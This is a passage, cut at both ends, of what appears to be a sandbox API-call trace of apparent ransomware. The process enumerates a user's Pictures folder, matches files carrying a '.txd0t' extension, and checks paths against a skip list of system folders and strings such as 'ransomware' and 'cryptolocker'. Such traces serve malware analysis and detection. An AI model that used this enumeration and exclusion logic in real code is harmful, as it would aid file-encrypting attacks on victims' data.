lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9f8140, ftCreationTime.dwHighDateTime=0x1d5e23d, ftLastAccessTime.dwLowDateTime=0x5c019460, ftLastAccessTime.dwHighDateTime=0x1d5e2d0, ftLastWriteTime.dwLowDateTime=0x5290e1f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x15d62, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="QQo9Vv.bmp.txd0t", cAlternateFileName="QQO9VV~1.TXD")) returned 1 [0119.906] StrCmpW (psz1="QQo9Vv.bmp.txd0t", psz2=".") returned 1 [0119.906] StrCmpW (psz1="QQo9Vv.bmp.txd0t", psz2="..") returned 1 [0119.906] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.906] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.906] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="QQo9Vv.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\QQo9Vv.bmp.txd0t" [0119.906] PathFindExtensionW (pszPath="QQo9Vv.bmp.txd0t") returned=".txd0t" [0119.906] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.906] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe8c1790, ftCreationTime.dwHighDateTime=0x1d5e190, ftLastAccessTime.dwLowDateTime=0x372d81b0, ftLastAccessTime.dwHighDateTime=0x1d5edf4, ftLastWriteTime.dwLowDateTime=0x5290e1f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd706, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="VM0 JSKujUy.jpg.txd0t", cAlternateFileName="VM0JSK~1.TXD")) returned 1 [0119.906] StrCmpW (psz1="VM0 JSKujUy.jpg.txd0t", psz2=".") returned 1 [0119.906] StrCmpW (psz1="VM0 JSKujUy.jpg.txd0t", psz2="..") returned 1 [0119.906] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.906] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.906] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="VM0 JSKujUy.jpg.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\VM0 JSKujUy.jpg.txd0t" [0119.906] PathFindExtensionW (pszPath="VM0 JSKujUy.jpg.txd0t") returned=".txd0t" [0119.906] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.906] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5f92080, ftCreationTime.dwHighDateTime=0x1d5e937, ftLastAccessTime.dwLowDateTime=0x141a96f0, ftLastAccessTime.dwHighDateTime=0x1d5e222, ftLastWriteTime.dwLowDateTime=0x52934366, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18749, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="wAVErpzAz.png.txd0t", cAlternateFileName="WAVERP~1.TXD")) returned 1 [0119.906] StrCmpW (psz1="wAVErpzAz.png.txd0t", psz2=".") returned 1 [0119.906] StrCmpW (psz1="wAVErpzAz.png.txd0t", psz2="..") returned 1 [0119.906] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.906] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.906] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="wAVErpzAz.png.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\wAVErpzAz.png.txd0t" [0119.906] PathFindExtensionW (pszPath="wAVErpzAz.png.txd0t") returned=".txd0t" [0119.906] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.906] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa578d1a0, ftCreationTime.dwHighDateTime=0x1d5ec38, ftLastAccessTime.dwLowDateTime=0x87e119b0, ftLastAccessTime.dwHighDateTime=0x1d5ee48, ftLastWriteTime.dwLowDateTime=0x52934366, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17d83, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="xYVA6nzw2.bmp.txd0t", cAlternateFileName="XYVA6N~1.TXD")) returned 1 [0119.906] StrCmpW (psz1="xYVA6nzw2.bmp.txd0t", psz2=".") returned 1 [0119.906] StrCmpW (psz1="xYVA6nzw2.bmp.txd0t", psz2="..") returned 1 [0119.906] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-" [0119.906] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-", psz2="\\", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\" [0119.906] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\", psz2="xYVA6nzw2.bmp.txd0t", cchMax=1094 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\kG7T_G4j-\\xYVA6nzw2.bmp.txd0t" [0119.906] PathFindExtensionW (pszPath="xYVA6nzw2.bmp.txd0t") returned=".txd0t" [0119.906] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.906] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa578d1a0, ftCreationTime.dwHighDateTime=0x1d5ec38, ftLastAccessTime.dwLowDateTime=0x87e119b0, ftLastAccessTime.dwHighDateTime=0x1d5ee48, ftLastWriteTime.dwLowDateTime=0x52934366, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17d83, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="xYVA6nzw2.bmp.txd0t", cAlternateFileName="XYVA6N~1.TXD")) returned 0 [0119.906] FindClose (in: hFindFile=0xec1ab0 | out: hFindFile=0xec1ab0) returned 1 [0119.907] GetProcessHeap () returned 0xe30000 [0119.907] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.907] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x779d7ee0, ftCreationTime.dwHighDateTime=0x1d5ed4e, ftLastAccessTime.dwLowDateTime=0xc4854390, ftLastAccessTime.dwHighDateTime=0x1d5e949, ftLastWriteTime.dwLowDateTime=0x5295a591, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xbf03, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="msDAnVl Vs INrTL.jpg.txd0t", cAlternateFileName="MSDANV~1.TXD")) returned 1 [0119.907] StrCmpW (psz1="msDAnVl Vs INrTL.jpg.txd0t", psz2=".") returned 1 [0119.907] StrCmpW (psz1="msDAnVl Vs INrTL.jpg.txd0t", psz2="..") returned 1 [0119.907] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.907] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.907] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="msDAnVl Vs INrTL.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\msDAnVl Vs INrTL.jpg.txd0t" [0119.907] PathFindExtensionW (pszPath="msDAnVl Vs INrTL.jpg.txd0t") returned=".txd0t" [0119.907] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.907] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38c320d0, ftCreationTime.dwHighDateTime=0x1d5e899, ftLastAccessTime.dwLowDateTime=0xa9ae02d0, ftLastAccessTime.dwHighDateTime=0x1d5eb67, ftLastWriteTime.dwLowDateTime=0x5295a591, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1dc4, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="nDbY.bmp.txd0t", cAlternateFileName="NDBYBM~1.TXD")) returned 1 [0119.907] StrCmpW (psz1="nDbY.bmp.txd0t", psz2=".") returned 1 [0119.907] StrCmpW (psz1="nDbY.bmp.txd0t", psz2="..") returned 1 [0119.907] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.907] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.907] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="nDbY.bmp.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\nDbY.bmp.txd0t" [0119.907] PathFindExtensionW (pszPath="nDbY.bmp.txd0t") returned=".txd0t" [0119.907] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.907] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87624400, ftCreationTime.dwHighDateTime=0x1d5e92a, ftLastAccessTime.dwLowDateTime=0x4b8617f0, ftLastAccessTime.dwHighDateTime=0x1d5e40b, ftLastWriteTime.dwLowDateTime=0x5298074d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18b8f, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="oOTvWfHAVr.png.txd0t", cAlternateFileName="OOTVWF~1.TXD")) returned 1 [0119.907] StrCmpW (psz1="oOTvWfHAVr.png.txd0t", psz2=".") returned 1 [0119.907] StrCmpW (psz1="oOTvWfHAVr.png.txd0t", psz2="..") returned 1 [0119.907] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.907] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.907] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="oOTvWfHAVr.png.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\oOTvWfHAVr.png.txd0t" [0119.907] PathFindExtensionW (pszPath="oOTvWfHAVr.png.txd0t") returned=".txd0t" [0119.907] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.907] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="Saved Pictures", cAlternateFileName="SAVEDP~1")) returned 1 [0119.907] StrCmpW (psz1="Saved Pictures", psz2=".") returned 1 [0119.907] StrCmpW (psz1="Saved Pictures", psz2="..") returned 1 [0119.907] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.907] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.907] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="Saved Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\boot\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\programdata\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\drivers\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\wsus\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="crypt_detect") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="cryptolocker") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="ransomware") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.908] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", lpSrch="C:\\Program Files") returned 0x0 [0119.908] GetProcessHeap () returned 0xe30000 [0119.908] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d0) returned 0xed39f8 [0119.908] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures" [0119.908] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures", psz2="\\*", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*") returned="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*" [0119.908] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Saved Pictures\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1a30 [0119.908] StrCmpW (psz1=".", psz2=".") returned 0 [0119.909] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4e37, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.909] StrCmpW (psz1="..", psz2=".") returned 1 [0119.909] StrCmpW (psz1="..", psz2="..") returned 0 [0119.909] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.909] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.909] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.909] FindNextFileW (in: hFindFile=0xec1a30, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51311410, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51311410, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51311410, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.909] FindClose (in: hFindFile=0xec1a30 | out: hFindFile=0xec1a30) returned 1 [0119.909] GetProcessHeap () returned 0xe30000 [0119.909] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.909] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20da860, ftCreationTime.dwHighDateTime=0x1d5ee0e, ftLastAccessTime.dwLowDateTime=0xf31774b0, ftLastAccessTime.dwHighDateTime=0x1d5ed8d, ftLastWriteTime.dwLowDateTime=0x529a6958, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3a39, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="SjHlBfZqKWu.bmp.txd0t", cAlternateFileName="SJHLBF~1.TXD")) returned 1 [0119.909] StrCmpW (psz1="SjHlBfZqKWu.bmp.txd0t", psz2=".") returned 1 [0119.909] StrCmpW (psz1="SjHlBfZqKWu.bmp.txd0t", psz2="..") returned 1 [0119.909] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.909] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.909] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="SjHlBfZqKWu.bmp.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\SjHlBfZqKWu.bmp.txd0t" [0119.909] PathFindExtensionW (pszPath="SjHlBfZqKWu.bmp.txd0t") returned=".txd0t" [0119.909] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.909] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x708056c0, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0xe96971d0, ftLastAccessTime.dwHighDateTime=0x1d5e486, ftLastWriteTime.dwLowDateTime=0x529a6958, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa0d9, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="SUlXmTX1.jpg.txd0t", cAlternateFileName="SULXMT~1.TXD")) returned 1 [0119.909] StrCmpW (psz1="SUlXmTX1.jpg.txd0t", psz2=".") returned 1 [0119.909] StrCmpW (psz1="SUlXmTX1.jpg.txd0t", psz2="..") returned 1 [0119.909] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.909] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.909] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="SUlXmTX1.jpg.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\SUlXmTX1.jpg.txd0t" [0119.909] PathFindExtensionW (pszPath="SUlXmTX1.jpg.txd0t") returned=".txd0t" [0119.909] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.909] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe868d20, ftCreationTime.dwHighDateTime=0x1d5e6d1, ftLastAccessTime.dwLowDateTime=0x71777220, ftLastAccessTime.dwHighDateTime=0x1d5e7e8, ftLastWriteTime.dwLowDateTime=0x529ccb88, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18445, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="wI6_mSLtm0QHgo.gif.txd0t", cAlternateFileName="WI6_MS~1.TXD")) returned 1 [0119.909] StrCmpW (psz1="wI6_mSLtm0QHgo.gif.txd0t", psz2=".") returned 1 [0119.909] StrCmpW (psz1="wI6_mSLtm0QHgo.gif.txd0t", psz2="..") returned 1 [0119.909] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.909] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.909] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="wI6_mSLtm0QHgo.gif.txd0t", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif.txd0t") returned="C:\\Users\\FD1HVy\\Pictures\\wI6_mSLtm0QHgo.gif.txd0t" [0119.909] PathFindExtensionW (pszPath="wI6_mSLtm0QHgo.gif.txd0t") returned=".txd0t" [0119.910] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.910] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc99ffe0, ftCreationTime.dwHighDateTime=0x1d5ece6, ftLastAccessTime.dwLowDateTime=0x899e87d0, ftLastAccessTime.dwHighDateTime=0x1d5e59a, ftLastWriteTime.dwLowDateTime=0x529ccb88, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf9f6, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t", cAlternateFileName="X7M0JV~1.TXD")) returned 1 [0119.910] StrCmpW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t", psz2=".") returned 1 [0119.910] StrCmpW (psz1="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t", psz2="..") returned 1 [0119.910] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.910] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.910] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="x7M0JVNEgkR8AAFTEXtY.jpg.txd0t", cchMax=1074 | out: 